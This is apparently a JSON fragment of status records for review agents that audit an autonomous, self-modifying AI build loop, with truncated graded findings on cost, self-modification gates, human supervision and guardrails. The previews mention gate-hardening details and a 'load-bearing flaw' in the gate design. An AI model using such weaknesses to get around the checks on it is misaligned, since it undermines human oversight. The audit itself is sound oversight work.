"lastToolSummary": "Economics & Efficiency",
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
"lastProgressAt": 1783052475785,
"tokens": 40664,
"toolCalls": 14,
"durationMs": 327574,
"resultPreview": "{\"area\":\"Economics & Efficiency\",\"grade\":\"C\",\"working_well\":[\"The Fable-builder tiering is a genuine, data-backed win. Builder attempt-1 runs Fable, retries run Opus (build-loop.workflow.js:419). Cumulative first-shot rate is 16/16 (100%) across the two trial runs (METRICS.jsonl last 2 lines: fableFirstShots 8/8 twice) vs the ~33% Opus baseline. Arithmetic: at 33% first-shot the Opus path averages…"
},
{
"type": "workflow_agent",
"index": 5,
"label": "review:selfmod-safety",
"phaseIndex": 1,
"phaseTitle": "Review",
"agentId": "a10909935ad4879b0",
"model": "claude-opus-4-8[1m]",
"state": "done",
"startedAt": 1783052275793,
"queuedAt": 1783051936566,
"attempt": 1,
"lastToolName": "StructuredOutput",
"lastToolSummary": "Self-Modification Safety (Architect engine self-upgrade + g…",
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
"lastProgressAt": 1783052494689,
"tokens": 42251,
"toolCalls": 12,
"durationMs": 218896,
"resultPreview": "{\"area\":\"Self-Modification Safety (Architect engine self-upgrade + gates)\",\"grade\":\"C\",\"summary\":\"The two gate scripts are more thoughtfully hardened than typical (comment/string stripping so an invariant can't hide in a prompt; a smoke scenario that runs FAILING verdicts and asserts NO commit, catching the gutted-gate case that trace-order can't). But the design has a load-bearing flaw: the gate …"
},
{
"type": "workflow_agent",
"index": 6,
"label": "review:supervision-protocol",
"phaseIndex": 1,
"phaseTitle": "Review",
"agentId": "a109e08254b763803",
"model": "claude-opus-4-8[1m]",
"state": "done",
"startedAt": 1783052475785,
"queuedAt": 1783051936566,
"attempt": 1,
"lastToolName": "StructuredOutput",
"lastToolSummary": "The Supervision Layer (human-facing supervisor session abov…",
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
"lastProgressAt": 1783052617115,
"tokens": 27180,
"toolCalls": 10,
"durationMs": 141329,
"resultPreview": "{\"area\":\"The Supervision Layer (human-facing supervisor session above the engine)\",\"grade\":\"C\",\"summary\":\"The supervision layer is unusually honest and its governance judgment is strong — the ledger notes are a model of forensic bookkeeping, and the human/loop guardrail line held under real pressure (real funds sent, guardrail-removal requested, declined). But the mechanics are structurally fragil…"
},
{
"type": "workflow_agent",
"index": 7,
"label": "review:outside-skeptic",
"phaseIndex": 1,
"phaseTitle": "Review",
"agentId": "a470c2e17ac7af6fe",
"model": "claude-opus-4-8[1m]",
"state": "done",
"startedAt": 1783052494693,
"queuedAt": 1783051936567,
"attempt": 1,
"lastToolName": "StructuredOutput",
"lastToolSummary": "The Outside Skeptic — startup-CTO / AI-safety read on the w…",
"promptPreview": "You are auditing an AUTONOMOUS BUILD LOOP that has been building the \"verifyhash\" product (repo /home/loopdev/verifyhash) unattended for ~10 days, 290+ commits, 3800+ tests. The loop is a Claude-Code Workflow script at /home/loopdev/verifyhash/build-loop.workflow.js (referred to as \"the engine\", currently engine #24). It runs a pinned agent spine per task: Planner -> Decider -> Strategist -> Build…",
"lastProgressAt": 1783052617734,
"tokens": 70285,
"toolCalls": 11,
"durationMs": 123040,
"resultPreview": "{\"area\":\"The Outside Skeptic — startup-CTO / AI-safety read on the whole operation\",\"grade\":\"C-\",\"working_well\":[\"Guardrail discipline is genuinely excellent and rare. STRATEGY.md lines 6-10 hard-forbid push/deploy/real-funds/real-keys, and the loop has held it across 296 commits — every outward or legal action is parked as a `needs-human` proposal (P-1..P-11). The refusal to issue a token-as-secu…"
}
],
"totalTokens": 362685,
"totalToolCalls": 75
}